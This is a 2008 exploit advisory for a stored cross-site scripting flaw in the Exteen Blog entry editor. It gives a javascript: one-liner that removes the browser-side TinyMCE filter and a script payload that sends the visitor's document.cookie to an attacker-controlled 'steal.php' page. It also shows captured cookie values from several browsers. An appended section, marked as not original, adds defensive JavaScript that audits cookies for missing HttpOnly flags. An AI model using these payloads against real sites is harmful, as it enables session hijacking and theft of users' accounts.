==========================================================
Exteen Blog XSS Remote Cookie Disclosure Exploit
==========================================================
AUTHOR : CWH Underground
DATE : 22 May 2008
SITE : www.citec.us
#####################################################
APPLICATION : Exteen Blog
VENDOR : www.exteen.com
#####################################################
--- Vulnerable page ---
[-] http://www.exteen.com/manage/entryeditor.php (Create New Entry Page)
--- Description ---
There are two ways to exploit this page:
1. Type the following into the address bar and press Enter:
   javascript:(function(){var x = document.getElementById('mce_editor_0_parent'); x.previousSibling.style.display = 'block';x.parentNode.removeChild (x);})()
2. Disable JavaScript in your browser and visit the vulnerable page.
Either method removes the TinyMCE filter, which is applied only in the browser; after that you can insert any script or HTML tag in your entry :D
--- Exploit (Grabbing Cookies)---
Simple Attack: <script>document.location = 'http://yoursite.com/steal.php?cookie=' + document.cookie;</script>
--- Note ---
This website implements HttpOnly, which prevents script from stealing cookies on IE (>= 6) and Firefox (>= 2.0.0.5)
=Result=
IE & Gecko: _uid57334=D8428C8A.2; _cbclose57334=1; _ctout57334=1; VisitOn=54016; VisitorTRUE=11
OPERA & Safari: _cbclose57334=1; _uid57334=16944A6F.1; sid=gdcvv9mab89uf9cmg3hqmhq570;
keyx=NjgdHFErNXpCD1wpVTsYCF0dfx8KBTIDEFM; _ctout57334=1
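The difference between the two Result lines, as an added example (not part of the original advisory): a JavaScript model of which cookies document.cookie exposes when a browser honors or ignores HttpOnly, plus an audit for session-like cookies sent without the flag. The Set-Cookie headers are constructed, and placing HttpOnly on sid and keyx is an assumption inferred from the Result lines.

```javascript
// Constructed Set-Cookie headers. Cookie names come from the advisory's
// Result section; values are placeholders and the HttpOnly flags are an
// assumption inferred from which cookies IE/Gecko did not expose.
const sampleHeaders = [
  "sid=PLACEHOLDER; Path=/; HttpOnly",
  "keyx=PLACEHOLDER; Path=/; HttpOnly",
  "_uid57334=PLACEHOLDER; Path=/",
  "_cbclose57334=1; Path=/",
  "_ctout57334=1; Path=/",
];

// Parse one Set-Cookie header value into name, value and a lowercase attribute set.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  if (eq < 1) return null; // no cookie name: ignore the header
  return {
    name: pair.slice(0, eq),
    value: pair.slice(eq + 1),
    attrs: new Set(attrs.filter(Boolean).map((a) => a.split("=")[0].trim().toLowerCase())),
  };
}

// Names that document.cookie would return. honorsHttpOnly=false models a
// browser without HttpOnly support (Opera and Safari in the advisory).
function scriptReadable(headers, honorsHttpOnly) {
  return headers
    .map(parseSetCookie)
    .filter((c) => c && !(honorsHttpOnly && c.attrs.has("httponly")))
    .map((c) => c.name);
}

// Audit: cookies whose name looks like a session credential but lack HttpOnly.
// The name pattern is a hypothetical heuristic; tune it per application.
function missingHttpOnly(headers, pattern = /^(sid|keyx|sess|auth|token)/i) {
  return headers
    .map(parseSetCookie)
    .filter((c) => c && pattern.test(c.name) && !c.attrs.has("httponly"))
    .map((c) => c.name);
}

console.log("HttpOnly honored:", scriptReadable(sampleHeaders, true));
console.log("HttpOnly ignored:", scriptReadable(sampleHeaders, false));
console.log("Missing HttpOnly:", missingHttpOnly(sampleHeaders));
```

HttpOnly only limits what injected script can read; the entry body still has to be filtered or encoded on the server, because the TinyMCE filter can be removed by the client.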
##################################################################
# Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C #
##################################################################